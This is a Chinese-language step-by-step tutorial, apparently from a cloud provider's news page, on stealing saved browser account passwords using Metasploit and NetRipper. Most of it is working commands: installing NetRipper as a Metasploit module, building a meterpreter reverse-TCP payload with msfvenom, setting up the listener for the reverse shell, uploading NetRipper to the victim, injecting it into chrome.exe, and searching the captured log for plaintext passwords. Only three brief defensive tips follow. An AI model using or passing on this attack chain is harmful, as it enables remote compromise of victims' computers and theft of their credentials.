如何進行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

如何進行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

前言

我將手把手教會各位Buffer如何使用Metasploit+NetRipper獲取Chrome等瀏覽器內(nèi)保存的帳號密碼。

需要工具:

Kali Linux&Metasploit

NetRipper

1.下載并且配置NetRipper

git clone https://github.com/NytroRST/NetRipper.git

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

2.生成Windows的Payload用于建立于目標機器的連接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe

3.啟動Metasploit并且進行監(jiān)聽

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST IP

set LPORT 6666

options

exploit

目標機運行Payload獲取到反彈shell

4.上傳DLL和exe文件到目標機器的C:\Users\Administrator\AppData\Local\Temp目錄下

Upload /root/Desjtop/NetRipper/x64/DLL.dll
Upload /root/Desjtop/NetRipper/x64/NetRipper.exe

shell
NetRipper.exe 

   
運行NetRipper.exe    

NetRipper.exe –w DLL.dll –l TEMP –p true –d 4096 –s user,pass

NetRipper.exe ConfiguredDLL.dll chrome.exe 

我注入到了是chrome瀏覽器的進程,你也可以注入到其他瀏覽器(火狐，QQ瀏覽器，360瀏覽器等等)的進程，這里以Chrom瀏覽器為主

5.測試驗證

打開那個剛剛下載的txt文件

Ctir+F輸入pwpw或者pwd、pass、password等關鍵詞來搜索明文密碼

如果獲取失敗帳號密碼的話，可能是網(wǎng)站使用了Https協(xié)議，或者登陸時在本地就進行了帳號口令的一個加密混淆！(個人推斷)   防范方法:

1.不要點擊來歷不明的文件

2.瀏覽器登錄可以掃描就掃描登錄

3.如果沒有必要個人建議不要在瀏覽器保存自己的社交帳號密碼

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關知識有進一步的了解或閱讀更多相關文章，請關注億速云行業(yè)資訊頻道，感謝您對億速云的支持。